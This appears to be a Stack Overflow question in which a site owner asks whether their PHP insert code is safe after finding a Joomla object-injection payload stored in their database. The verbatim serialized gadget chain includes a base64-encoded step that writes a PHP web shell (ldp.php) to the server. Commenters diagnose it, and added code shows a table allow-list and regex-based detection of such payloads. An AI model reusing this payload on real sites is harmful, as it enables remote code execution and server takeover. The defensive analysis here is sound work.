Today I saw this in my SQL database:

```
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:
{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:
{}s:8:"feed_url";s:207:"
eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2xkcC5waHAnLCdFRTlBQUVFQzREOEU0NDM5Mjk5MDQ2QjhDREIzRjc4MiA8P3BocCBAZXZhbCgkX1BPU1RbImZrIl0pOycpOw));
JFactory::getConfig();
exit;";
s:19:"cache_name_function";
s:6:"assert";s:5:"cache"
;b:1;s:11:"cache_class";
O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}
```

I'm using this code to put data into the database:

```php
<?php
// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}

// Placeholders bind the two values; the table name is interpolated directly
$stmt = $conn->prepare("INSERT INTO $TABLE (VALUE, DEVICE) VALUES (?, ?)");
// prepare() returns false on a SQL error, so check before binding
if ($stmt === false) {
    die("Prepare failed: " . $conn->error);
}
$stmt->bind_param("ss", $VALUE, $DEVICE);

$stmt->execute();
$stmt->close();
$conn->close();
?>
```

Am I safe?

Is my code secure or should I add another layer of security?
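An added example (not the asker's code) of how the insert above can be written so that every interpolated piece is either bound or checked. It keeps the question's variable names (`$servername`, `$username`, `$password`, `$dbname`, `$TABLE`, `$VALUE`, `$DEVICE`); the table names in `ALLOWED_TABLES` and the function name `insertReading` are assumptions made up for the example. The point it shows: `?` placeholders can only bind values, never identifiers, so `$TABLE` needs its own allow-list check, while the serialized-object string in `$VALUE` is just inert text once it is bound as a parameter, as long as nothing later calls `unserialize()` on it.

```php
<?php
// Added example, not the question's original code.
// Assumes $servername, $username, $password, $dbname, $TABLE, $VALUE and
// $DEVICE are set exactly as in the question.

// Hypothetical allow-list: the only tables this endpoint may write to.
// A placeholder cannot stand in for an identifier, so the table name is
// validated here instead of being bound.
const ALLOWED_TABLES = ['sensor_readings', 'device_log'];

function insertReading(mysqli $conn, string $table, string $value, string $device): int
{
    if (!in_array($table, ALLOWED_TABLES, true)) {
        throw new InvalidArgumentException("Table not allowed: $table");
    }

    // Backticks quote the (already whitelisted) identifier; the two values
    // are bound, so a serialized PHP object or a quote in $value is stored
    // literally and never interpreted by MySQL.
    $sql  = "INSERT INTO `$table` (VALUE, DEVICE) VALUES (?, ?)";
    $stmt = $conn->prepare($sql);
    $stmt->bind_param('ss', $value, $device);
    $stmt->execute();
    $rows = $stmt->affected_rows;
    $stmt->close();
    return $rows;
}

// Make mysqli throw on any error instead of returning false, so a failed
// prepare() cannot be followed by a bind_param() on a boolean.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

$conn = new mysqli($servername, $username, $password, $dbname);
$conn->set_charset('utf8mb4');

try {
    insertReading($conn, $TABLE, $VALUE, $DEVICE);
} finally {
    $conn->close();
}
```

If the rows are read back later, keep treating `VALUE` as an opaque string: echo it through `htmlspecialchars()` and never pass it to `unserialize()`; if structured data is needed, store and parse JSON instead.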

Sam M
Adrian yo
  • You can use regular expressions to validate $VALUE, $DEVICE before inserting into database. – Abhishek Sinha Jul 19 '18 at 01:01
  • Read about [cross-site scripting](https://en.wikipedia.org/wiki/Cross-site_scripting). – Dan Guzman Jul 19 '18 at 01:02
  • Seems to be a vulnerability in your version of Joomla https://blog.cloudflare.com/the-joomla-unserialize-vulnerability/ – Havenard Jul 19 '18 at 01:06
  • Possible duplicate of [How can I prevent SQL injection in PHP?](https://stackoverflow.com/questions/60174/how-can-i-prevent-sql-injection-in-php) – Sam M Jul 19 '18 at 01:06
  • 2
    The data in your database is a serialized PHP object. Your use of query parameters are fine, so `$VALUE` and `$DEVICE` cannot cause problems. But what is the value of `$TABLE`? If that comes from untrusted content, it could be an SQL injection vulnerability. – Bill Karwin Jul 19 '18 at 01:37
  • FYI, that string in the database looks like it's the result of calling `serialize()` on a mysqli object. – Barmar Jul 19 '18 at 01:40
  • Ooo - that is nasty. "ZmlsZ..." tries to write 'ldp.php' to your disk. Possibly the hacker will later try to execute it. This looks more like trying to hack into Javascript instead of (or via?) PHP/MySQL. See if there is such a file in your 'DOCUMENT_ROOT'. – Rick James Jul 19 '18 at 19:48
  • @Rick James So for what file name should I look in my root folder? I have a bunch of files there. – Adrian yo Jul 20 '18 at 18:52
  • `ldp.php` is what I decoded from the `eval` argument. – Rick James Jul 20 '18 at 19:00
  • I don't have anything like this in root folder. Thank you for help. – Adrian yo Jul 21 '18 at 21:42
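An added example, not code from the question or any of the commenters, that turns the comments above into two checks a site owner can run: flag stored rows that carry the signatures of the payload shown in the question (a PHP serialized object header `O:<n>:"Class":`, an `eval(base64_decode(` wrapper, or the `\0\0\0` markers of protected properties), and look under `DOCUMENT_ROOT` for the `ldp.php` file name Rick James decoded, along with any recently modified `.php` file. The column name `id`, the function names and the pattern names are assumptions; `$conn` and `$TABLE` are the question's own variables.

```php
<?php
// Added example, not the asker's code. Assumes $conn (a mysqli connection)
// and $TABLE are set up as in the question and that the table has an `id`
// column (hypothetical).

// Signatures of what the stored row in the question looks like. These are
// detection heuristics, not a full parser.
const SUSPICIOUS_PATTERNS = [
    'serialized_object' => '/O:\d+:"[\w\\\\]+":\d+:\{/',      // O:21:"JDatabaseDriverMysqli":3:{
    'eval_base64'       => '/eval\s*\(\s*base64_decode\s*\(/i', // eval(base64_decode(
    'null_byte_prop'    => '/\\\\0\\\\0\\\\0|\x00/',           // \0\0\0 or real NUL bytes
];

// Return the names of every pattern that matches $value (empty array if none).
function classifyValue(string $value): array
{
    $hits = [];
    foreach (SUSPICIOUS_PATTERNS as $name => $re) {
        if (preg_match($re, $value)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Walk a table and report rows whose VALUE column triggers any pattern.
// The table name is interpolated, so only pass a name you control.
function scanTable(mysqli $conn, string $table): array
{
    $findings = [];
    $res = $conn->query("SELECT id, VALUE, DEVICE FROM `$table`");
    while ($row = $res->fetch_assoc()) {
        $hits = classifyValue((string) $row['VALUE']);
        if ($hits) {
            $findings[] = ['id' => $row['id'], 'device' => $row['DEVICE'], 'hits' => $hits];
        }
    }
    return $findings;
}

// Look for the file name the payload tries to write (ldp.php, from the
// comments) and for any .php file changed within $maxAgeSeconds.
function findDroppedFiles(string $docRoot, array $names = ['ldp.php'], int $maxAgeSeconds = 86400): array
{
    $found = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($docRoot, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        $recent = (time() - $file->getMTime()) < $maxAgeSeconds;
        if (in_array($file->getFilename(), $names, true)
            || ($recent && $file->getExtension() === 'php')) {
            $found[] = $file->getPathname();
        }
    }
    return $found;
}

// Constructed sample: the beginning of the row shown in the question.
$sample = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}';
assert(classifyValue($sample) === ['serialized_object']);

// Usage against the live data; log findings rather than echoing them.
foreach (scanTable($conn, $TABLE) as $finding) {
    error_log('suspicious row: ' . json_encode($finding));
}
foreach (findDroppedFiles($_SERVER['DOCUMENT_ROOT']) as $path) {
    error_log('suspicious file: ' . $path);
}
```

A flagged row by itself is only evidence that someone sent the payload; it does harm only if some code path calls `unserialize()` on it, so the follow-up is to grep the application for `unserialize(` and to compare the dropped-file scan against a known-good file list from backups.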

0 Answers